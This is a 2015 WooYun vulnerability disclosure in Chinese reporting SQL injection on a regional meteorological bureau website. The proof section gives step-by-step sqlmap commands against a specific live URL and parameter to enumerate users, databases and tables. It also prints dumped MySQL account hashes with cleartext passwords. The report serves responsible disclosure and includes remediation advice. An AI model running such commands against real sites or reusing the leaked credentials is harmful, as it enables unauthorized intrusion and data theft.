漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0106563
漏洞标题:某省地市气象网门户存在SQL注入漏洞
相关厂商:cncert国家互联网应急中心
漏洞作者: 路人甲
提交时间:2015-04-09 18:32
修复时间:2015-05-28 18:00
公开时间:2015-05-28 18:00
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-23: 细节向核心白帽子及相关领域专家公开
2015-05-03: 细节向普通白帽子公开
2015-05-13: 细节向实习白帽子公开
2015-05-28: 细节向公众公开
简要描述:
由于应用程序自己不存在SQL注入的防护模块,导致存在明显的注入漏洞,同时可以分析的出,站点前面也没有添加web防护墙设备,导致很轻松的获取远程服务器上的一下banner信息以及数据库相关信息。
详细说明:
由于应用程序自己不存在SQL注入的防护模块,导致存在明显的注入漏洞,同时详细分析,站点前面也没有添加web防护墙设备,但是WAF的策略配置不是很好,导致很轻松的获取远程服务器上的一下banner信息以及数据库相关信息。
漏洞证明:
1.安康气象网
2.随便点开一个链接,习惯行的进行sql注入尝试,发现站点自身程序没有防注入措施,同事站点部署也比较差,基础建设也不健全,未部署针对web的安全防火墙(WAF),下面可以很轻易的发现注入点
3.系统信息sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634"
4.获取当前用户:sqlmap.py -u “http://www.akqxj.com/qxywxinxi.php?id=634” --current-user
5.获取当前数据库名称:sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634" --current-db
6.dbms 指定数据库类型查看数据库管理员用户:sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634" "Mysql" –users
7.列数据库:sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634" --dbs
8.读数据库密码:sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634" –passwords,但是对完没开放端口,连接不成功
[*] myuser [1]:
password hash: *FABE5482D5AADF36D028AC443D117BE1180B9725
clear-text password: mypassword
[*] root [1]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
9.列表名:sqlmap.py -u "http://www.akqxj.com/qxywxinxi.php?id=634" --tables -D "qixiangju"
10.在列字段中发现,自己的IP被封了,换了几个IP还是不行,可以看出基础建设里面应该有web防火墙,应该是WAF的策略没配置好。
后面也不测试,问题已经很清晰了,漏洞也确实是存在的,希望尽快修复(该加固的加固,该调整策略的调整策略的调整策略)。
修复方案:
1.web程序本身而言,添加基本的防注入模块,提高系统代码本身的安全性;
2.调整安全产品的安全策略。
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2015-04-13 17:58
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。
最新状态:
暂无